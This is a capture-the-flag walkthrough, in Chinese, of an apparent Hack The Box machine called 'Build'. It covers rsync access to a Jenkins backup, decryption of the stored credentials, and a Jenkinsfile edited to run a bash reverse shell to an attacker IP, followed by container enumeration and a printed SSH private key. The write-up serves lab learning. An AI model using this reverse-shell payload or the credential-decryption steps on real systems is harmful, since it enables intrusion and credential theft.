Build
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# nmap 10.129.234.169 -p 22,53,512,514,513,873,3000 -sCV -O -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 12:06 EST
Nmap scan report for 10.129.234.169
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:21:73:e2:6b:96:cd:f9:13:11:af:40:c8:4d:d6:7f (ECDSA)
|_ 256 2b:5e:ba:f3:72:d3:b3:09:df:25:41:29:09:f4:7b:f5 (ED25519)
53/tcp open domain PowerDNS
| dns-nsid:
| NSID: pdns (70646e73)
|_ id.server: pdns
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
3000/tcp open http Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=250c127e9b495720; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=tzE5lvQZzgB8XEKi65WWDb5YcEw6MTc2NzM3MzU3NjI2MzE5NzIyNA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 02 Jan 2026 17:06:16 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=40d7a5432563f6b8; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=cnMdAPP-IvCF9DDQ-ckNzgWNRTM6MTc2NzM3MzU3NjYzODgwMjQwMg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 02 Jan 2026 17:06:16 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=1/2%Time=6957FB08%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,2546,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\
SF:x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea=2
SF:50c127e9b495720;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:
SF:\x20_csrf=tzE5lvQZzgB8XEKi65WWDb5YcEw6MTc2NzM3MzU3NjI2MzE5NzIyNA;\x20Pa
SF:th=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options
SF::\x20SAMEORIGIN\r\nDate:\x20Fri,\x2002\x20Jan\x202026\x2017:06:16\x20GM
SF:T\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-a
SF:uto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-
SF:width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20cu
SF:p\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:appl
SF:ication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSI
SF:sInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdX
SF:JsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9id
SF:WlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwi
SF:c2l6ZXMiOiI1MTJ")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method
SF:\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:
SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-C
SF:ookie:\x20i_like_gitea=40d7a5432563f6b8;\x20Path=/;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nSet-Cookie:\x20_csrf=cnMdAPP-IvCF9DDQ-ckNzgWNRTM6MTc2NzM3M
SF:zU3NjYzODgwMjQwMg;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSit
SF:e=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x2002\x20Jan\x
SF:202026\x2017:06:16\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReque
SF:st,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.64 seconds
1.2. Gitea
gitea
有一个公共仓库
里面有一个文件 jenkinsfile
pipeline {
agent any
stages {
stage('Do nothing') {
steps {
sh '/bin/true'
}
}
}
}
gitea版本为1.21.11,这是一个相对较老的版本
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# dirsearch -u http://10.129.234.169:3000/ -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/Build/reports/http_10.129.234.169_3000/__26-01-02_12-13-22.txt
Target: http://10.129.234.169:3000/
[12:13:22] Starting:
[ ] 2% 264/11460 217/s job:1/1 errors:0sync -av --list-only rsy[12:13:29] 200 - 206B - /.well-known/security.txt
[12:13:29] 200 - 1KB - /.well-known/openid-configuration
[12:13:29] 200 - 16KB - /123
[12:13:32] 303 - 38B - /admin -> /user/login
[12:13:34] 303 - 38B - /admin/ -> /user/login
[12:13:39] 200 - 706B - /api/swagger
[12:13:50] 303 - 41B - /explore -> /explore/repos
[12:13:51] 200 - 15KB - /explore/repos
[12:13:51] 301 - 58B - /favicon.ico -> /assets/img/favicon.png
[12:13:55] 303 - 38B - /issues -> /user/login
[12:14:13] 200 - 277B - /sitemap.xml
[12:14:19] 200 - 11KB - /user/login/
[12:14:19] 401 - 50B - /v2
[12:14:19] 401 - 50B - /v2/
[12:14:19] 401 - 50B - /v2/_catalog
Task Completed
没啥特别的,都是常规东西
1.3. rsync
#列出共享目录
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# rsync -av --list-only rsync://10.129.234.169:873
backups backups
#复制到本地
┌──(root㉿kali)-[~/Desktop/htb/Build/backups]
└─# rsync -avP rsync://10.129.234.169:873/backups/ ./backups
receiving incremental file list
./
jenkins.tar.gz
20,021,248 5% 830.04kB/s 0:07:09 rsync: [receiver] write error: Broken pipe (32)
rsync error: received SIGINT, SIGTERM, or SIGHUP (code 20) at io.c(1701) [sender=3.2.7]
376,289,280 100% 1.14MB/s 0:05:15 (xfr#1, to-chk=0/2)
sent 50 bytes received 376,381,276 bytes 1,185,452.00 bytes/sec
total size is 376,289,280 speedup is 1.00
这个备份文件非常大,下载请耐心等待
1.4. jenkins 凭证解密
┌──(root㉿kali)-[~/…/Build/backups/backups/jenkins_configuration]
└─# cat /root/Desktop/htb/Build/backups/backups/jenkins_configuration/jobs/build/config.xml
<?xml version='1.1' encoding='UTF-8'?>
<jenkins.branch.OrganizationFolder plugin="branch-api@2.1163.va_f1064e4a_a_f3">
<actions/>
<description>dev</description>
<displayName>dev</displayName>
<properties>
<jenkins.branch.OrganizationChildHealthMetricsProperty>
<templates>
<com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<nonRecursive>false</nonRecursive>
</com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric>
</templates>
</jenkins.branch.OrganizationChildHealthMetricsProperty>
<jenkins.branch.OrganizationChildOrphanedItemsProperty>
<strategy class="jenkins.branch.OrganizationChildOrphanedItemsProperty$Inherit"/>
</jenkins.branch.OrganizationChildOrphanedItemsProperty>
<jenkins.branch.OrganizationChildTriggersProperty>
<templates>
<com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<spec>H H/4 * * *</spec>
<interval>86400000</interval>
</com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
</templates>
</jenkins.branch.OrganizationChildTriggersProperty>
<com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain plugin="credentials@1337.v60b_d7b_c7b_c9f">
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl plugin="credentials@1337.v60b_d7b_c7b_c9f">
<id>e4048737-7acd-46fd-86ef-a3db45683d4f</id>
<description></description>
>>>> <username>buildadm</username>
>>>> <password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
<usernameSecret>false</usernameSecret>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty>
<jenkins.branch.NoTriggerOrganizationFolderProperty>
<branches>.*</branches>
<strategy>NONE</strategy>
</jenkins.branch.NoTriggerOrganizationFolderProperty>
</properties>
<folderViews class="jenkins.branch.OrganizationFolderViewHolder">
<owner reference="../.."/>
</folderViews>
<healthMetrics/>
<icon class="jenkins.branch.MetadataActionFolderIcon">
<owner class="jenkins.branch.OrganizationFolder" reference="../.."/>
</icon>
<orphanedItemStrategy class="com.cloudbees.hudson.plugins.folder.computed.DefaultOrphanedItemStrategy" plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<pruneDeadBranches>true</pruneDeadBranches>
<daysToKeep>-1</daysToKeep>
<numToKeep>-1</numToKeep>
<abortBuilds>false</abortBuilds>
</orphanedItemStrategy>
<triggers>
<com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<spec>* * * * *</spec>
<interval>60000</interval>
</com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
</triggers>
<disabled>false</disabled>
<navigators>
<org.jenkinsci.plugin.gitea.GiteaSCMNavigator plugin="gitea@1.4.7">
<serverUrl>http://172.18.0.2:3000</serverUrl>
<repoOwner>buildadm</repoOwner>
<credentialsId>e4048737-7acd-46fd-86ef-a3db45683d4f</credentialsId>
<traits>
<org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
<trust class="org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait$TrustContributors"/>
</org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
</traits>
</org.jenkinsci.plugin.gitea.GiteaSCMNavigator>
</navigators>
<projectFactories>
<org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory plugin="workflow-multibranch@773.vc4fe1378f1d5">
<scriptPath>Jenkinsfile</scriptPath>
</org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
</projectFactories>
<buildStrategies/>
<strategy class="jenkins.branch.DefaultBranchPropertyStrategy">
<properties class="empty-list"/>
</strategy>
</jenkins.branch.OrganizationFolder>
这里里面有buildadm用户的加密密码,这是一个Jenkins的加密密码,你需要使用 jenkins-credentials-decryptor 来进行解密
wget https://github.com/hoto/jenkins-credentials-decryptor/releases/download/1.2.2/jenkins-credentials-decryptor_1.2.2_Linux_x86_64
Jenkins 将加密的凭据存储在
credentials.xml文件或config.xml文件中。要解密它们,您需要master.key和hudson.util.Secret文件。
所有文件都位于 Jenkins 主目录中:
$JENKINS_HOME/credentials.xml
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
$JENKINS_HOME/jobs/example-folder/config.xml - Possible location
┌──(root㉿kali)-[~/…/htb/Build/backups/backups]
└─# ./jenkins-credentials-decryptor -m jenkins_configuration/secrets/master.key -s jenkins_configuration/secrets/hudson.util.Secret -c jenkins_configuration/jobs/build/config.xml -o json
[
{
"id": "e4048737-7acd-46fd-86ef-a3db45683d4f",
"password": "Git1234!",
"username": "buildadm"
}
]
获取到了账号密码
尝试登录ssh,失败了
但是可以登录 gitea
然后我可以控制这个 jenkinfile的内容了,他是一个pipeline的文件,我认为我只要更新他,他就会被执行
pipeline {
agent any
stages {
stage('Do nothing') {
steps {
sh 'bash -c "bash -i >& /dev/tcp/10.10.14.79/5566 0>&1"'
}
}
}
}
我将其改成上面的样子
然后等待一小会,就可以收到shell
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# penelope -p 5566
[+] Listening for reverse shells on 0.0.0.0:5566 → 127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.79
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one Raw session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.14.79:5566
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/5ac6c7d6fb8e~10.129.3.222-Linux-x86_64/2026_01_03-00_00_24-470.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <3>
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# whoami
root
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# df -h
Filesystem Size Used Avail Use% Mounted on
overlay 9.8G 6.2G 3.5G 65% /
tmpfs 64M 0 64M 0% /dev
shm 64M 0 64M 0% /dev/shm
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 6.2G 3.5G 65% /root
tmpfs 2.0G 0 2.0G 0% /proc/acpi
tmpfs 2.0G 0 2.0G 0% /proc/scsi
tmpfs 2.0G 0 2.0G 0% /sys/firmware
很明显这是一个docker
root@5ac6c7d6fb8e:~# cat user.txt
466098e1d44521703f270f93699c40f7
非特权容器
root@5ac6c7d6fb8e:~# cat /proc/self/status | grep CapEff
CapEff: 00000000a80425fb
2. Root
2.1. 信息收集
在root目录下,有两个域名,和一个私钥
root@5ac6c7d6fb8e:~# ls -la
total 20
drwxr-xr-x 3 root root 4096 May 2 2024 .
drwxr-xr-x 1 root root 4096 May 9 2024 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4096 May 1 2024 .ssh
-rw------- 1 root root 33 Apr 15 2025 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
admin.build.vl +
intern.build.vl +
root@5ac6c7d6fb8e:~# cd .ssh/
root@5ac6c7d6fb8e:~/.ssh# ls
authorized_keys id_ed25519 id_ed25519.pub known_hosts
root@5ac6c7d6fb8e:~/.ssh# cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAm/6DUhI
ohhpEGJwj3C3qvAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIFSs6NCV2xJJ++4a
ohH5HDgMOTsuvoWe3lTcVQmDW2ytAAAAkHUEeuYvOBdKVdSwd5eyr2kFUV05G7azCKN0j+
giavLEwH1wOa+wP1WVmq3jJSJ1geoSbYUH0+fwTbkIm0ARreMOjSwvz7PkX5xIeZZxx1HU
bWLoVkFnBQ8UY0gm5Dpbj5IvjAp7Ij2VitXYX0PfRDQ+bB4cSD7gwTX0Ud+HsAKvPBEvvb
DTsZ0XMDXTRUGloA==
-----END OPENSSH PRIVATE KEY-----
root@5ac6c7d6fb8e:~/.ssh# cat authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFSs6NCV2xJJ++4aohH5HDgMOTsuvoWe3lTcVQmDW2yt root@build
上传 CDK 进行检查是否存在逃逸漏洞
root@5ac6c7d6fb8e:~# ./cdk evaluate
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2026/01/03 05:16:22 current dir: /root
2026/01/03 05:16:22 current user: root uid: 0 gid: 0 home: /root
2026/01/03 05:16:22 hostname: 5ac6c7d6fb8e
2026/01/03 05:16:22 debian debian 12.4 kernel: 5.15.0-144-generic
2026/01/03 05:16:22 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/bin/chfn
/bin/chsh
/bin/gpasswd
/bin/mount
/bin/newgrp
/bin/passwd
/bin/su
/bin/umount
[ Information Gathering - Services ]
2026/01/03 05:16:22 service found in process:
7 1 java
[ Information Gathering - Commands and Capabilities ]
2026/01/03 05:16:22 available commands:
curl,find,ps,java,apt,dpkg,ssh,git,mount,base64,perl
2026/01/03 05:16:22 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ]
0:54 / / rw,relatime - overlay overlay rw,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/V2F6ZNPIHKU26FVXC5QMEVCKSZ:/var/snap/docker/common/var-lib-docker/overlay2/l/EX3MGHGXA4UDTLSHZXTL3E25FI:/var/snap/docker/common/var-lib-docker/overlay2/l/WJEVTV2RCASDCKLLHRJGOFGTK6:/var/snap/docker/common/var-lib-docker/overlay2/l/VAD74F2AYI4LDRELY74ZHDTATB:/var/snap/docker/common/var-lib-docker/overlay2/l/BZHSNE2E55YFVMN5ETQBXHRI63:/var/snap/docker/common/var-lib-docker/overlay2/l/XU6DS5L66RV5AYZY4I47OKXQQC:/var/snap/docker/common/var-lib-docker/overlay2/l/RUIDGT3NZLDLIHOA2ZPVTRLZP4:/var/snap/docker/common/var-lib-docker/overlay2/l/HZDEZSQFVQMUD3B2JGLMLO5X37:/var/snap/docker/common/var-lib-docker/overlay2/l/6RMUVKVN4R4DRTH74RPQ4KSDHY:/var/snap/docker/common/var-lib-docker/overlay2/l/WQ7ETK3HX4XXJBCWFSSB7WEYLM:/var/snap/docker/common/var-lib-docker/overlay2/l/QHTNHO26H5LQHHW3IUZHWDVMSO:/var/snap/docker/common/var-lib-docker/overlay2/l/2H5DM2W3C7PCPYPMEIJCSUXEOE:/var/snap/docker/common/var-lib-docker/overlay2/l/VCQNF6GCMMA2BVOVFOQVBWRPT7,upperdir=/var/snap/docker/common/var-lib-docker/overlay2/039ea08f40b4927d3175b42a1df2f8ab4d6ce5eb51afbe6b84393d7bcc174055/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/039ea08f40b4927d3175b42a1df2f8ab4d6ce5eb51afbe6b84393d7bcc174055/work
0:85 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:86 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:87 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:88 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:69 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:89 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
253:0 /root/scripts/root /root rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /root/scripts/jenkins/jenkins_configuration /var/jenkins_home rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:85 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:85 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:93 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:86 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:86 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:86 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:94 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:95 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2026/01/03 05:16:22 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
[ Discovery - K8s API Server ]
2026/01/03 05:16:22 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2026/01/03 05:16:23 failed to dial Alibaba Cloud API.
2026/01/03 05:16:24 failed to dial Azure API.
2026/01/03 05:16:24 failed to dial Google Cloud API.
2026/01/03 05:16:24 failed to dial Tencent Cloud API.
2026/01/03 05:16:25 failed to dial OpenStack API.
2026/01/03 05:16:26 failed to dial Amazon Web Services (AWS) API.
2026/01/03 05:16:27 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2026/01/03 05:16:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
root@5ac6c7d6fb8e:~# ./cdk ifconfig
2026/01/03 05:23:52 [+] run ifconfig, using GetLocalAddresses()
2026/01/03 05:23:52 lo 127.0.0.1/8
2026/01/03 05:23:52 eth0 172.18.0.3/16
root@5ac6c7d6fb8e:~# ./cdk netstat
2026/01/03 05:24:54 [+] run netstat, using RunNestat()
ipType connection localAddr status remoteAddr pid
ipv4 tcp 0.0.0.0:8080 LISTEN 0.0.0.0:0 7
ipv4 tcp 127.0.0.11:37741 LISTEN 0.0.0.0:0 0
ipv4 tcp 0.0.0.0:50000 LISTEN 0.0.0.0:0 7
ipv4 tcp 172.18.0.3:41288 ESTABLISHED 10.10.14.79:5566 510
ipv4 tcp 172.18.0.3:35158 ESTABLISHED 10.10.14.79:5566 346
ipv4 tcp 172.18.0.3:51772 TIME_WAIT 172.18.0.2:3000 0
ipv4 tcp 172.18.0.3:35154 ESTABLISHED 10.10.14.79:5566 312
ipv4 tcp 172.18.0.3:51784 TIME_WAIT 172.18.0.2:3000 0
ipv4 tcp 172.18.0.3:51774 TIME_WAIT 172.18.0.2:3000 0
ipv4 udp 127.0.0.11:49745 NONE 0.0.0.0:0 0
2.2. 端口扫描
root@5ac6c7d6fb8e:~# ./nmap -sn 172.18.0.3/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2026-01-03 05:25 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.18.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000064s latency).
MAC Address: 02:42:C2:C1:31:E0 (Unknown)
Nmap scan report for gitea.custom (172.18.0.2)
Host is up (0.000022s latency).
MAC Address: 02:42:AC:12:00:02 (Unknown)
Nmap scan report for pdns-db-1.custom (172.18.0.4)
Host is up (0.000019s latency).
MAC Address: 02:42:AC:12:00:04 (Unknown)
Nmap scan report for pdns-pdns-1.custom (172.18.0.5)
Host is up (0.000019s latency).
MAC Address: 02:42:AC:12:00:05 (Unknown)
Nmap scan report for powerdns_admin.custom (172.18.0.6)
Host is up (0.000036s latency).
MAC Address: 02:42:AC:12:00:06 (Unknown)
Nmap scan report for 5ac6c7d6fb8e (172.18.0.3)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 4.55 seconds
